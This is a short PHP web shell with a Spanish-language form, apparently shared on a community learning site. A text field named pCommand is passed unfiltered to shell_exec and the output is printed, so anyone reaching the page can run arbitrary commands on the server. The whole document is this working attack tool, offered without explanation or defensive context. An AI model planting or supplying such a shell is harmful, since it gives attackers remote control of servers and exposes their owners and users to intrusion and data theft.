WEB SHELL
<form action="" method="POST" enctype="application/x-www-form-urlencoded">
<table style="margin-left: auto; margin-right: auto">
<tr>
<td colspan="2" style="text-align: center; font-weight: bold; color: #770000;">
Inserta el comando requerido
</td>
</tr>
<tr><td> </td></tr>
<tr>
<td style="font-weight: bold;">Comando</td>
<td><input type="text" name="pCommand" size=""></td>
</tr>
<tr><td> </td></tr>
<tr>
<td colspan="2" style="text-align: center;">
<input type="submit" value="Ejecutar Comando">
</td>
</tr>
</table>
</form>
<?php
if (isset($_REQUEST["pCommand"])) {
echo "<pre>";
echo shell_exec($_REQUEST["pCommand"]);
echo "</pre>";
}
?>
¿Quieres ver más aportes, preguntas y respuestas de la comunidad?